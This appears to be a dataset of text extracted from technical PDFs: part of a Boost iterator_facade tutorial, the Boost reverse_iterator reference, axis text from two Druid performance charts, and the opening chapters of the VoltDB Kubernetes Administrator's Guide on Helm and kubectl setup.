node_base const& n)\n{\nn.print(s);\nreturn s;\n}\nOur first challenge is to build an appropriate iterator over these lists.\nA Basic Iterator Using iterator_facade\nWe will construct a node_iterator class using inheritance from iterator_facade to implement most\nof the iterator’s operations.\n# include \"node.hpp\"\n# include <boost/iterator/iterator_facade.hpp>\nclass node_iterator\n: public boost::iterator_facade<...>\n{\n...\n};\nTemplate Arguments for iterator_facade\niterator_facade has several template parameters, so we must decide what types to use for the argu-\nments. The parameters are Derived ,Value ,CategoryOrTraversal ,Reference , and Difference .\nDerived\nBecause iterator_facade is meant to be used with the CRTP [ Cop95 ] the first parameter is the iterator\nclass name itself, node_iterator .\nValue\nThe Value parameter determines the node_iterator ’svalue_type . In this case, we are iterating over\nnode_base objects, so Value will be node_base .\nCategoryOrTraversal\nNow we have to determine which iterator traversal concept ournode_iterator is going to model.\nSingly-linked lists only have forward links, so our iterator can’t can’t be a bidirectional traversal iter-\nator. Our iterator should be able to make multiple passes over the same linked list (unlike, say, an\nistream_iterator which consumes the stream it traverses), so it must be a forward traversal iterator .\nTherefore, we’ll pass boost::forward_traversal_tag in this position1.\n1iterator_facade also supports old-style category tags, so we could have passed\nstd::forward_iterator_tag here; either way, the resulting iterator’s iterator_category will\nend up being std::forward_iterator_tag .\n11Reference\nThe Reference argument becomes the type returned by node_iterator ’s dereference operation, and\nwill also be the same as std::iterator_traits<node_iterator>::reference . The library’s default\nfor this parameter is Value& ; since node_base& is a good choice for the iterator’s reference type, we\ncan omit this argument, or pass use_default .\nDifference\nThe Difference argument determines how the distance between two node_iterator s will be mea-\nsured and will also be the same as std::iterator_traits<node_iterator>::difference_type . The\nlibrary’s default for Difference isstd::ptrdiff_t , an appropriate type for measuring the distance\nbetween any two addresses in memory, and one that works for almost any iterator, so we can omit this\nargument, too.\nThe declaration of node_iterator will therefore look something like:\n# include \"node.hpp\"\n# include <boost/iterator/iterator_facade.hpp>\nclass node_iterator\n: public boost::iterator_facade<\nnode_iterator\n, node_base\n, boost::forward_traversal_tag\n>\n{\n...\n};\nConstructors and Data Members\nNext we need to decide how to represent the iterator’s position. This representation will take the form\nof data members, so we’ll also need to write constructors to initialize them. The node_iterator ’s\nposition is quite naturally represented using a pointer to a node_base . We’ll need a constructor to\nbuild an iterator from a node_base* , and a default constructor to satisfy the forward traversal iterator\nrequirements2. Our node_iterator then becomes:\n# include \"node.hpp\"\n# include <boost/iterator/iterator_facade.hpp>\nclass node_iterator\n: public boost::iterator_facade<\nnode_iterator\n, node_base\n, boost::forward_traversal_tag\n>\n{\npublic:\nnode_iterator()\n: m_node(0)\n{}\nexplicit node_iterator(node_base* p)\n: m_node(p)\n12{}\nprivate:\n...\nnode_base* m_node;\n};\nImplementing the Core Operations\nThe last step is to implement the core operations required by the concepts we want our iterator to model.\nReferring to the table , we can see that the first three rows are applicable because node_iterator needs\nto satisfy the requirements for readable iterator ,single pass iterator , and incrementable iterator .\nWe therefore need to supply dereference ,equal , and increment members. We don’t want these\nmembers to become part of node_iterator ’s public interface, so we can make them private and grant\nfriendship to boost::iterator_core_access , a “back-door” that iterator_facade uses to get access\nto the core operations:\n# include \"node.hpp\"\n# include <boost/iterator/iterator_facade.hpp>\nclass node_iterator\n: public boost::iterator_facade<\nnode_iterator\n, node_base\n, boost::forward_traversal_tag\n>\n{\npublic:\nnode_iterator()\n: m_node(0) {}\nexplicit node_iterator(node_base* p)\n: m_node(p) {}\nprivate:\nfriend class boost::iterator_core_access;\nvoid increment() { m_node = m_node->next(); }\nbool equal(node_iterator const& other) const\n{\nreturn this->m_node == other.m_node;\n}\nnode_base& dereference() const { return *m_node; }\nnode_base* m_node;\n};\n2Technically, the C++ standard places almost no requirements on a default-constructed iterator, so if\nwe were really concerned with efficiency, we could’ve written the default constructor to leave m_node\nuninitialized.\n13Voil` a; a complete and conforming readable, forward-traversal iterator! For a working example of its\nuse, see this program .\nA constant node_iterator\nConstant and Mutable iterators\nThe term mutable iterator means an iterator through which the object it references (its“referent” )\ncan be modified. A constant iterator is one which doesn’t allow modification of its referent.\nThe words constant and mutable don’t refer to the ability to modify the iterator itself. For\nexample, an int const* is a non- const constant iterator , which can be incremented but doesn’t\nallow modification of its referent, and int* const is aconst mutable iterator , which cannot be\nmodified but which allows modification of its referent.\nConfusing? We agree, but those are the standard terms. It probably doesn’t help much that a\ncontainer’s constant iterator is called const_iterator .\nNow, our node_iterator gives clients access to both node ’sprint(std::ostream&) const member\nfunction, but also its mutating double_me() member. If we wanted to build a constant node_iterator ,\nwe’d only have to make three changes:\nclass const_node_iterator\n: public boost::iterator_facade<\nconst_node_iterator\n, node_base const\n, boost::forward_traversal_tag\n>\n{\npublic:\nconst_node_iterator()\n: m_node(0) {}\nexplicit const_node_iterator(node_base* p)\n: m_node(p) {}\nprivate:\nfriend class boost::iterator_core_access;\nvoid increment() { m_node = m_node->next(); }\nbool equal(const_node_iterator const& other) const\n{\nreturn this->m_node == other.m_node;\n}\nnode_base const& dereference() const { return *m_node; }\nnode_base const* m_node;\n};\n14const and an iterator’s value_type\nThe C++ standard requires an iterator’s value_type not beconst -qualified, so itera-\ntor_facade strips the const from its Value parameter in order to produce the iterator’s\nvalue_type . Making the Value argument const provides a useful hint to iterator_facade\nthat the iterator is a constant iterator , and the default Reference argument will be correct for\nall lvalue iterators.\nAs a matter of fact, node_iterator and const_node_iterator are so similar that it makes sense\nto factor the common code out into a template as follows:\ntemplate <class Value>\nclass node_iter\n: public boost::iterator_facade<\nnode_iter<Value>\n, Value\n, boost::forward_traversal_tag\n>\n{\npublic:\nnode_iter()\n: m_node(0) {}\nexplicit node_iter(Value* p)\n: m_node(p) {}\nprivate:\nfriend class boost::iterator_core_access;\nbool equal(node_iter<Value> const& other) const\n{\nreturn this->m_node == other.m_node;\n}\nvoid increment()\n{ m_node = m_node->next(); }\nValue& dereference() const\n{ return *m_node; }\nValue* m_node;\n};\ntypedef node_iter<node_base> node_iterator;\ntypedef node_iter<node_base const> node_const_iterator;\nInteroperability\nOur const_node_iterator works perfectly well on its own, but taken together with node_iterator\nit doesn’t quite meet expectations. For example, we’d like to be able to pass a node_iterator\nwhere a node_const_iterator was expected, just as you can with std::list<int> ’siterator and\nconst_iterator . Furthermore, given a node_iterator and a node_const_iterator into the same\nlist, we should be able to compare them for equality.\n15This expected ability to use two different iterator types together is known as interoperability .\nAchieving interoperability in our case is as simple as templatizing the equal function and adding a\ntemplatized converting constructor34:\ntemplate <class Value>\nclass node_iter\n: public boost::iterator_facade<\nnode_iter<Value>\n, Value\n, boost::forward_traversal_tag\n>\n{\npublic:\nnode_iter()\n: m_node(0) {}\nexplicit node_iter(Value* p)\n: m_node(p) {}\ntemplate <class OtherValue>\nnode_iter(node_iter<OtherValue> const& other)\n: m_node(other.m_node) {}\nprivate:\nfriend class boost::iterator_core_access;\ntemplate <class> friend class node_iter;\ntemplate <class OtherValue>\nbool equal(node_iter<OtherValue> const& other) const\n{\nreturn this->m_node == other.m_node;\n}\nvoid increment()\n{ m_node = m_node->next(); }\nValue& dereference() const\n{ return *m_node; }\nValue* m_node;\n};\ntypedef impl::node_iterator<node_base> node_iterator;\ntypedef impl::node_iterator<node_base const> node_const_iterator;\nYou can see an example program which exercises our interoperable iterators here.\n3If you’re using an older compiler and it can’t handle this example, see the example code for\nworkarounds.\n4Ifnode_iterator had been a random access traversal iterator , we’d have had to templatize its\ndistance_to function as well.\n16Telling the Truth\nNow node_iterator and node_const_iterator behave exactly as you’d expect... almost. We can\ncompare them and we can convert in one direction: from node_iterator tonode_const_iterator . If\nwe try to convert from node_const_iterator tonode_iterator , we’ll get an error when the converting\nconstructor tries to initialize node_iterator ’sm_node , anode* with a node const* . So what’s the\nproblem?\nThe problem is that boost:: is_convertible <node_const_iterator,node_iterator>::value will\nbetrue , but it should be false .is_convertible lies because it can only see as far as the declaration\nofnode_iter ’s converting constructor, but can’t look inside at the definition to make sure it will com-\npile. A perfect solution would make node_iter ’s converting constructor disappear when the m_node\nconversion would fail.\nIn fact, that sort of magic is possible using boost::enable_if . By rewriting the converting con-\nstructor as follows, we can remove it from the overload set when it’s not appropriate:\n#include <boost/type_traits/is_convertible.hpp>\n#include <boost/utility/enable_if.hpp>\n...\nprivate:\nstruct enabler {};\npublic:\ntemplate <class OtherValue>\nnode_iter(\nnode_iter<OtherValue> const& other\n, typename boost::enable_if<\nboost::is_convertible<OtherValue*,Value*>\n, enabler\n>::type = enabler()\n)\n: m_node(other.m_node) {}\nWrap Up\nThis concludes our iterator_facade tutorial, but before you stop reading we urge you to take a look\natiterator_adaptor . There’s another way to approach writing these iterators which might even be\nsuperior.\n17" } ]
{ "category": "App Definition and Development", "file_name": "ingestion_rate.pdf", "project_name": "Druid", "subcategory": "Database" }
[ { "data": "050,000100,000150,000200,000250,000\nDec 15 Jan 01 Jan 15 Feb 01 Feb 15 Mar 01\ntimeevents / sdatasource\ns\nt\nu\nv\nw\nx\ny\nzEvents per second ... 24h moving average" } ]
{ "category": "App Definition and Development", "file_name": "reverse_iterator.pdf", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "Reverse Iterator\nAuthor : David Abrahams, Jeremy Siek, Thomas Witt\nContact : dave@boost-consulting.com ,jsiek@osl.iu.edu ,witt@ive.uni-hannover.de\nOrganization :Boost Consulting , Indiana University Open Systems Lab , University of\nHanover Institute for Transport Railway Operation and Construction\nDate : 2004-11-01\nCopyright : Copyright David Abrahams, Jeremy Siek, and Thomas Witt 2003.\nabstract: The reverse iterator adaptor iterates through the adapted iterator range in the\nopposite direction.\nTable of Contents\nreverse_iterator synopsis\nreverse_iterator requirements\nreverse_iterator models\nreverse_iterator operations\nExample\nreverse_iterator synopsis\ntemplate <class Iterator>\nclass reverse_iterator\n{\npublic:\ntypedef iterator_traits<Iterator>::value_type value_type;\ntypedef iterator_traits<Iterator>::reference reference;\ntypedef iterator_traits<Iterator>::pointer pointer;\ntypedef iterator_traits<Iterator>::difference_type difference_type;\ntypedef /* see below */ iterator_category;\nreverse_iterator() {}\nexplicit reverse_iterator(Iterator x) ;\ntemplate<class OtherIterator>\nreverse_iterator(\nreverse_iterator<OtherIterator> const& r\n, typename enable_if_convertible<OtherIterator, Itera-\ntor>::type* = 0 // exposition\n);\nIterator const& base() const;\n1reference operator*() const;\nreverse_iterator& operator++();\nreverse_iterator& operator--();\nprivate:\nIterator m_iterator; // exposition\n};\nIfIterator models Random Access Traversal Iterator and Readable Lvalue Iterator, then itera-\ntor_category is convertible to random_access_iterator_tag . Otherwise, if Iterator models Bidirec-\ntional Traversal Iterator and Readable Lvalue Iterator, then iterator_category is convertible to bidi-\nrectional_iterator_tag . Otherwise, iterator_category is convertible to input_iterator_tag .\nreverse_iterator requirements\nIterator must be a model of Bidirectional Traversal Iterator. The type iterator_traits<Iterator>::reference\nmust be the type of *i, where iis an object of type Iterator .\nreverse_iterator models\nA specialization of reverse_iterator models the same iterator traversal and iterator access concepts\nmodeled by its Iterator argument. In addition, it may model old iterator concepts specified in the\nfollowing table:\nIfImodels then reverse_iterator<I> models\nReadable Lvalue Iterator, Bidirectional Traversal\nIteratorBidirectional Iterator\nWritable Lvalue Iterator, Bidirectional Traversal\nIteratorMutable Bidirectional Iterator\nReadable Lvalue Iterator, Random Access\nTraversal IteratorRandom Access Iterator\nWritable Lvalue Iterator, Random Access\nTraversal IteratorMutable Random Access Iterator\nreverse_iterator<X> is interoperable with reverse_iterator<Y> if and only if Xis interoperable\nwith Y.\nreverse_iterator operations\nIn addition to the operations required by the concepts modeled by reverse_iterator ,reverse_iterator\nprovides the following operations.\nreverse_iterator();\nRequires: Iterator must be Default Constructible.\nEffects: Constructs an instance of reverse_iterator with m_iterator default constructed.\nexplicit reverse_iterator(Iterator x);\nEffects: Constructs an instance of reverse_iterator with m_iterator copy constructed\nfrom x.\ntemplate<class OtherIterator>\nreverse_iterator(\n2reverse_iterator<OtherIterator> const& r\n, typename enable_if_convertible<OtherIterator, Itera-\ntor>::type* = 0 // exposition\n);\nRequires: OtherIterator is implicitly convertible to Iterator .\nEffects: Constructs instance of reverse_iterator whose m_iterator subobject is con-\nstructed from y.base() .\nIterator const& base() const;\nReturns: m_iterator\nreference operator*() const;\nEffects:\nIterator tmp = m_iterator;\nreturn *--tmp;\nreverse_iterator& operator++();\nEffects: --m_iterator\nReturns: *this\nreverse_iterator& operator--();\nEffects: ++m_iterator\nReturns: *this\ntemplate <class BidirectionalIterator>\nreverse_iterator<BidirectionalIterator>n\nmake_reverse_iterator(BidirectionalIterator x);\nReturns: An instance of reverse_iterator<BidirectionalIterator> with a current\nconstructed from x.\nExample\nThe following example prints an array of characters in reverse order using reverse_iterator .\nchar letters_[] = \"hello world!\";\nconst int N = sizeof(letters_)/sizeof(char) - 1;\ntypedef char* base_iterator;\nbase_iterator letters(letters_);\nstd::cout << \"original sequence of letters:\\t\\t\\t\" << let-\nters_ << std::endl;\nboost::reverse_iterator<base_iterator>\nreverse_letters_first(letters + N),\nreverse_letters_last(letters);\nstd::cout << \"sequence in reverse order:\\t\\t\\t\";\nstd::copy(reverse_letters_first, reverse_letters_last,\n3std::ostream_iterator<char>(std::cout));\nstd::cout << std::endl;\nstd::cout << \"sequence in double-reversed (normal) order:\\t\";\nstd::copy(boost::make_reverse_iterator(reverse_letters_last),\nboost::make_reverse_iterator(reverse_letters_first),\nstd::ostream_iterator<char>(std::cout));\nstd::cout << std::endl;\nThe output is:\noriginal sequence of letters: hello world!\nsequence in reverse order: !dlrow olleh\nsequence in double-reversed (normal) order: hello world!\nThe source code for this example can be found here.\n4" } ]
{ "category": "App Definition and Development", "file_name": "95th_percentile.pdf", "project_name": "Druid", "subcategory": "Database" }
[ { "data": "01000200030004000\nFeb 03 Feb 10 Feb 17 Feb 24\ntimequery time (s)datasource\na\nb\nc\nd\ne\nf\ng\nh95th percentile query latency" } ]
{ "category": "App Definition and Development", "file_name": "KubernetesAdmin.pdf", "project_name": "VoltDB", "subcategory": "Database" }
[ { "data": "VoltDB Kubernetes\nAdministrator's Guide\nAbstract\nThis book explains how to create and manage VoltDB database clusters using Kubernetes.\nV11.3VoltDB Kubernetes Administrator's Guide\nV11.3\nCopyright © 2020-2022 Volt Active Data, Inc.\nThe text and illustrations in this document are licensed under the terms of the GNU Affero General Public License Version 3 as published by the\nFree Software Foundation. See the GNU Affero General Public License ( http://www.gnu.org/licenses/ ) for more details.\nMany of the core VoltDB database features described herein are part of the VoltDB Community Edition, which is licensed under the GNU Affero\nPublic License 3 as published by the Free Software Foundation. Other features are specific to the VoltDB Enterprise Edition and VoltDB Pro, which\nare distributed by Volt Active Data, Inc. under a commercial license.\nThe VoltDB client libraries, for accessing VoltDB databases programmatically, are licensed separately under the MIT license.\nYour rights to access and use VoltDB features described herein are defined by the license you received when you acquired the software.\nVoltDB is a trademark of Volt Active Data, Inc.\nVoltDB software is protected by U.S. Patent Nos. 9,600,514, 9,639,571, 10,067,999, 10,176,240, and 10,268,707. Other patents pending.\nThis document was generated on March 07, 2022.Table of Contents\nPreface ........................................................................................................................... viii\n1. Structure of This Book .......................................................................................... viii\n2. Related Documents ............................................................................................... viii\n1. Introduction .................................................................................................................... 1\n1.1. Overview: Running VoltDB in Kubernetes ................................................................ 1\n1.2. Setting Up Your Kubernetes Environment ................................................................. 2\n1.2.1. Product Requirements .................................................................................. 3\n1.2.2. Configuring the Host Environment and Accounts ............................................. 3\n1.2.3. Configuring the Client ................................................................................. 3\n1.2.4. Granting Kubernetes Access to the Docker Repository ...................................... 4\n2. Configuring the VoltDB Database Cluster ............................................................................ 5\n2.1. Using Helm Properties ........................................................................................... 5\n2.2. Configuring the Cluster and Database ....................................................................... 6\n2.2.1. Configuring the Cluster ............................................................................... 7\n2.2.2. Configuring the Database ............................................................................. 8\n3. Managing VoltDB Databases in Kubernetes ....................................................................... 11\n3.1. Managing the Cluster Using the kubctl and helm ...................................................... 11\n3.2. Managing the Database Using voltadmin and sqlcmd ................................................. 12\n3.2.1. Accessing the Database Interactively ............................................................ 12\n3.2.2. Accessing the Database Programmatically ..................................................... 14\n4. Starting and Stopping the Database ................................................................................... 15\n4.1. Starting the Cluster for the First Time ..................................................................... 15\n4.2. Stopping and Restarting the Cluster ........................................................................ 15\n4.3. Resizing the Cluster with Elastic Scaling ................................................................. 15\n4.4. Pausing and Resuming the Cluster .......................................................................... 16\n5. Updates and Upgrades .................................................................................................... 17\n5.1. Updating the Database Schema .............................................................................. 17\n5.2. Updating the Database Configuration ...................................................................... 18\n5.2.1. Changing Database Properties on the Running Database ................................... 18\n5.2.2. Changing Database Properties That Require a Restart ...................................... 19\n5.2.3. Changing Cluster Properties ........................................................................ 20\n5.3. Upgrading the VoltDB Software and Helm Charts ..................................................... 20\n5.3.1. Updating Your Helm Repository ................................................................. 21\n5.3.2. Updating the Custom Resource Definition (CRD) ........................................... 21\n5.3.3. Upgrading the VoltDB Operator and Software ............................................... 21\n5.3.4. Updating VoltDB for XDCR Clusters ........................................................... 22\n6. Cross Datacenter Replication in Kubernetes ........................................................................ 24\n6.1. Requirements for XDCR in Kubernetes ................................................................... 24\n6.2. Choosing How to Establish a Network Mesh ............................................................ 24\n6.3. Common XDCR Properties ................................................................................... 26\n6.4. Configuring XDCR in Local Namespaces ................................................................ 26\n6.5. Configuring XDCR Using Load Balancers ............................................................... 27\n6.5.1. Separate Load Balancers For Each Node (cluster.serviceSpec.perpod) ................. 27\n6.5.2. Single Load Balancer For Discovery with Virtual Networking Peering (clus-\nter.serviceSpec.dr) .............................................................................................. 28\n6.6. Configuring XDCR Using Node Ports for Replication ................................................ 29\n6.7. Configuring XDCR Using Network Services ............................................................ 30\n7. Managing XDCR Clusters in Kubernetes ........................................................................... 32\n7.1. Removing a Cluster Temporarily ............................................................................ 32\n7.2. Removing a Cluster Permanently ........................................................................... 32\n7.3. Resetting XDCR When a Cluster Leaves Unexpectedly .............................................. 33\niiiVoltDB Kubernetes\nAdministrator's Guide\n7.4. Rejoining an XDCR Cluster That Was Previously Removed ........................................ 33\nA. VoltDB Helm Properties ................................................................................................ 35\nA.1. How to Use the Properties ................................................................................... 35\nA.2. Top-Level Kubernetes Options .............................................................................. 36\nA.3. Kubernetes Cluster Startup Options ....................................................................... 36\nA.4. Network Options ................................................................................................ 39\nA.5. VoltDB Database Startup Options ......................................................................... 42\nA.6. VoltDB Database Configuration Options ................................................................. 42\nivList of Figures\n1.1. Kubernetes/VoltDB Architecture ...................................................................................... 2\nvList of Tables\nA.1. Top-Level Options ...................................................................................................... 36\nA.2. Options Starting with cluster.clusterSpec... ...................................................................... 36\nA.3. Options Starting with cluster.serviceSpec... ..................................................................... 40\nA.4. Options Starting with cluster.config... ............................................................................. 42\nA.5. Options Starting with cluster.config.deployment... ............................................................ 42\nviList of Examples\n5.1. Process for Upgrading the VoltDB Software .................................................................... 22\nviiPreface\nThis book describes using Kubernetes and associated products to create and manage VoltDB databases\nand the clusters that host them. It is intended for database administrators and operators responsible for the\nongoing management and maintenance of database infrastructure in a containerized environment.\nThis book is not a tutorial on Kubernetes or VoltDB. Please see “Related Documents” below for documents\nthat can help you familiarize yourself with these topics.\n1. Structure of This Book\nThis book is divided into 7 chapters and 1 appendix:\n•Chapter 1, Introduction\n•Chapter 2, Configuring the VoltDB Database Cluster\n•Chapter 3, Managing VoltDB Databases in Kubernetes\n•Chapter 4, Starting and Stopping the Database\n•Chapter 5, Updates and Upgrades\n•Chapter 6, Cross Datacenter Replication in Kubernetes\n•Chapter 7, Managing XDCR Clusters in Kubernetes\n•Appendix A, VoltDB Helm Properties\n2. Related Documents\nThis book assumes a working knowledge of Kubernetes, VoltDB, and the other technologies used in a\ncontainerized environment (specifically Docker and Helm). For information on developing and managing\nVoltDB databases, please see the manuals Using VoltDB and VoltDB Administrator's Guide . For new\nusers, see the VoltDB Tutorial . For introductory information on the other products, please see their respec-\ntive websites for appropriate documentation:\n•Docker\n•Helm\n•Kubernetes\nFinally, this book and all other documentation associated with VoltDB can be found on the web at http://\ndocs.voltdb.com/ .\nviiiChapter 1. Introducon\nKubernetes is an environment for hosting virtualized applications and services run in containers. It is\ndesigned to automate the management of distributed applications, with a particular focus on microservices.\nVoltDB is not a microservice — there is coordination between the nodes of a VoltDB cluster that requires\nadditional attention. So although it is possible to spin up a generic set of Kubernetes \"pods\" to run a VoltDB\ndatabase, additional infrastructure is necessary to realize the full potential of Kubernetes and VoltDB\nworking together.\nVoltDB Enterprise Edition provides additional services to simplify, automate, and unlock the power of\nrunning VoltDB within Kubernetes environments. There are six key components to the VoltDB Kubernetes\noffering, three available as open-source applications for establishing the necessary hosting environment\nand three provided by VoltDB to Enterprise customers. The three open-source products required to run\nVoltDB in a Kubernetes environment are:\n•Kubernetes itself\n•Docker, for managing the container images\n•Helm, for automating the creation and administration of VoltDB in Kubernetes\nIn addition to these base requirements, VoltDB provides the following three custom components:\n•Pre-packaged docker image for running VoltDB cluster nodes\n•The VoltDB Operator , a separate utility (and docker image) for orchestrating the startup and manage-\nment of VoltDB clusters in Kubernetes\n•Helm charts for initializing and communicating with Kubernetes, the VoltDB Operator and its associ-\nated VoltDB cluster\nThe remainder of this chapter provides an overview of how these components work together to support\nrunning virtualized VoltDB clusters in a Kubernetes environment, the requirements for the host and client\nsystems, and instructions for preparing the host environment prior to running VoltDB. Subsequent chapters\nprovide details on configuring and starting your VoltDB cluster as well as common administrative tasks\nsuch as:\n•Starting, stopping, and modifying the VoltDB cluster\n•Managing the database schema and configuration\n•Configuring and starting multiple clusters using cross datacenter replication (XDCR)\nFinally, an appendix provides a full list of the Helm properties for configuring and controlling your VoltDB\nclusters.\n1.1. Overview: Running VoltDB in Kubernetes\nKubernetes lets you create clusters of virtual machines, on which you run \"pods\". Each pod acts as a sep-\narate virtualized system or container. The containers are pre-defined collections of system and application\ncomponents needed to run an application or service. Kubernetes provides the virtual machines, Docker\ndefines the containers, and Kubernetes takes responsibility for starting and stopping the appropriate num-\nber of pods that your application needs.\n1Introduction\nSo the basic architecture for running VoltDB is a VoltDB database running on multiple instances of a\nDocker container inside a Kubernetes cluster.\nHowever, out of the box, VoltDB and Kubernetes do not \"talk together\" and so there is no agreement on\nwhen pods are started and stopped and whether a VoltDB node is active or not. To solve this problem,\nVoltDB provides an additional service, the VoltDB Operator that manages the interactions between the\nVoltDB cluster and the Kubernetes infrastructure. The Operator takes responsibility for initializing and\nstarting the VoltDB server instances as appropriate, monitoring their health, and coordinating changes to\nthe configuration.\nTo further simplify the process, VoltDB uses the open-source management product Helm to integrate Ku-\nbernetes, Docker, and VoltDB under a single interface. Helm uses \"charts\" to define complex management\noperations, such as configuring and starting the Kubernetes pods with the appropriate Docker images and\nthen initializing and starting VoltDB on those pods. Simply by \"installing\" the appropriate Helm chart you\ncan instantiate and run a VoltDB database cluster within Kubernetes using a single command.\nOnce the database is running, you can use standard VoltDB command line utilities to interact with and\nmanage the database contents, such as modifying the schema or initiating manual snapshots. However,\nyou will continue to use Helm to manage the server process and cluster on which the database runs, for\nactivities such as stopping and starting the database. Figure 1.1, “Kubernetes/VoltDB Architecture” shows\nthe overall architecture of using VoltDB, the VoltDB Operator, and Helm to automate running a VoltDB\ndatabase within Kubernetes.\nFigure 1.1. Kubernetes/VoltDB Architecture\n1.2. Setting Up Your Kubernetes Environment\nBefore you can run VoltDB in a containerized environment, you must be sure your host systems and client\nare configured with the right software and permissions to support VoltDB. The following sections outline:\n2Introduction\n•What products are required on both the host environment and the local client you use to control Kuber-\nnetes and VoltDB\n•How to configure the host environment and user accounts to run the VoltDB components\n•How to configure your local client to control Kubernetes and the Helm charts\n•How to set permissions in Kubernetes and Docker to allow access to the VoltDB components\n1.2.1. Product Requirements\nBefore you start, you must make sure you have the correct software products and versions installed on\nboth the host system and your local client. The host environment is the set of servers where Kubernetes\nis installed, whether they are systems you set up yourself or hosted by a third-party cloud service, such\nas the Google Cloud Platform or Microsoft Azure. The local client environment is the system, such as a\ndesktop or laptop, you use to access the services.\nThe following are the software requirements for running VoltDB in Kubernetes.\nHost Environment\n•Kubernetes V1.19.x through V1.21.x\nClient Environment\n•Kubectl V1.19 or later1\n•Helm V3.6.x or later\nOptionally, you may want to install VoltDB on the client so you can use the voltadmin and sqlcmd\ncommand utilities to access the database remotely. If not, you can still use kubectl to create an interactive\nshell process on one of the server instances and run the utilities directly on the Kubernetes pods.\n1.2.2. Configuring the Host Environment and Accounts\nOnce you have the necessary software installed, you must prepare the host environment to run VoltDB.\nThis includes adding the appropriate Docker and chart repositories to Helm and configuring your host\naccount with the permissions necessary to access those repositories.\nFirst, you need accounts on the Kubernetes host environment and on the docker repository where the\nVoltDB images are stored, https://docker.io . To run the VoltDB Helm charts, your accounts must be set\nup with the following permissions:\n•Your Kubernetes host account must have sufficient permissions to allocate persistent volumes and\nclaims and create and manage pods.\n•Your Docker repository account must have permission to access the VoltDB docker images. Access to\nthe VoltDB docker images is assigned to VoltDB Enterprise customers on a per account basis. Contact\nVoltDB support for more information.\n1.2.3. Configuring the Client\nNext you must configure your client environment so you can communicate with and control Kubernetes\nand the Helm charts. First, install the Kubernetes and Helm command line interfaces, kubectl and helm.\nNext, configure the services to access the appropriate remote accounts and repositories.\n1Kubectl on the client must be within one minor version of Kubernetes in the host environment. For example, if Kubernetes is at version 1.17,\nKubectl can be 1.16, 1.17, or 1.18. See the Kubernetes version skew documentation for further information.\n3Introduction\nThe primary setup task for kubectl is creating the appropriate context for accessing the Kubernetes host\nyou will be using. This is usually done as part of the installation or with a Kubconfig file and the kubectl\nconfig command. Once you have a context defined, you can use the kubectl cluster-info command to\nverify that your client is configured correctly.\nFor helm, you must add a link to the VoltDB docker repository, using the helm repo add command:\n$ helm repo add voltdb \\\n https://voltdb-kubernetes-charts.storage.googleapis.com\nThe first argument to the command (\"voltdb\") is a short name for referencing the repository in future\ncommands. You can specify whatever name you like. The second argument is the location of the repository\nitself and must be entered as shown above.\nNote\nHelm first looks in local folders for charts you specify, then in the repositories. So if the short\nname you use matches a local directory, they van conflict and cause errors. In that case, you\nmay want to choose a different name, such as \"voltkube\", to avoid any ambiguity. Then the chart\nlocations you use in Helm commands would be \"voltkube/voltdb\" rather than \"voltdb/voltdb\" as\nshown in the examples.\n1.2.4. Granting Kubernetes Access to the Docker Repository\nFinally, you need to tell Kubernetes to access the Docker repository using the credentials for your Docker\naccount. There are several ways to do this. You can specify your credentials on the helm command line\neach time you install a new VoltDB cluster. You can save the credentials in a YAML file with other\nparameters you pass to helm. Or you can set the credentials in a Kuerbernetes secret using kubectl.\nThe advantage of using a secret to store the credentials is that you only need to define them once and they\nare not easily discovered by others, since they are encrypted. To create a Kubernetes secret you use the\nkubectl create secret command, specifying the type of secret ( docker-registry ) and the name of the secret\n(which must be dockerio-registry ), plus the individual credential elements as arguments:\n$ kubectl create secret docker-registry dockerio-registry \\\n --docker-username=johndoe \\\n --docker-password='ThisIsASecret' \\\n --docker-email=\"jdoe@anybody.org\nOnce you add the secret, you do not need to specify them again. If, on the other hand, you prefer to specify\nthe credentials when you issue the helm commands to initialize the VoltDB cluster, you can supply them as\nthe following helm properties using the methods described in Chapter 2, Configuring the VoltDB Database\nCluster:\n•global.image.credentials.username\n•global.image.credentials.password\n4Chapter 2. Configuring the VoltDB\nDatabase Cluster\nHelm simplifies the process of starting a VoltDB database cluster within Kubernetes by coordinating all\nthe different components involved, including Kubernetes, Docker, and VoltDB. By using the provided\nHelm charts, it is possible to start a default VoltDB cluster with a single command:\n$ helm install mydb voltdb/voltdb \\\n --set-file cluster.config.licenseXMLFile=license.xml\nThe name mydb specifies a name for the release you create, voltdb/voltdb specifies the Helm chart to\ninstall, and the --set-file argument specifies a new value for a property to customize the installation.\nIn this case, --set-file specifies the location of the VoltDB license needed to start the database. The\nlicense is the only property you must specify; all other properties have default values that are used if not\nexplicitly changed.\nHowever, a default cluster of three nodes and no schema or configuration is not particularly useful. So\nVoltDB provides Helm properties to let you customize every aspect of the database and cluster configu-\nration, including:\n•Cluster configuration , including size of the cluster, available resources, and so on\n•Network configuration , including the assignment of ports and external mappings\n•Database initialization options , including administration username and password, schema, and class files\n•Database configuration , including the settings normally found in the XML configuration file on non-\nKubernetes installations\nThe following sections explain how to use those properties to make some of the most common customiza-\ntions to your database. Appendix A, VoltDB Helm Properties provides a full list of the properties, includ-\ning a brief description and the default value for each.\n2.1. Using Helm Properties\nFirst, it is useful to understand the different ways you can specify properties on the Helm command line.\nThe following discussion is not intended as a complete description of Helm; only a summary to give you\nan idea of what they do and when to use them.\nHelm offers three different ways to specify properties:\n--set\nThe --set flag lets you specify individual property values on the command line. You can use --set\nmultiple times or separate multiple property/value pairs with commas. For example, the following\ntwo commands are equivalent:\n$ helm install mydb voltdb/voltdb \\\n --set cluster.serviceSpec.clientPort=22222 \\\n --set cluster.serviceSpec.adminPort=33333\n$ helm install mydb voltdb/voltdb \\\n --set cluster.serviceSpec.clientPort=22222,\\\n5Configuring the Volt-\nDB Database Cluster\ncluster.serviceSpec.adminPort=33333\nThe --set flag is useful for setting a few parameters that change frequently or for overriding parameters\nset earlier in the command line (such as in a YAML file).\n--set-file\nThe --set-file flag lets you specify the contents of a file as the value for a property. For example,\nthe following command sets the contents of the file license.xml as the license for starting the\nVoltDB cluster:\n$ helm install mydb voltdb/voltdb \\\n --set-file cluster.config.licenseXMLFile=license.xml\nAs with --set, You can use --set-file multiple times or separate multiple property/file pairs with\ncommas. The --set-file flag is useful for setting parameters where the value is too complicated\nto set directly on the command line. For example, the contents of the VoltDB license file.\n--values, -f\nThe --values flag lets you specify a file that contains multiple property definitions in YAML format.\nWhereas properties set on the command line with --set use dot notation to separate the property\nhierarchy, YAML puts each level of the hierarchy on a separate line, with indentation and followed\nby a colon. For example, the following YAML file (and --values flag set the same two 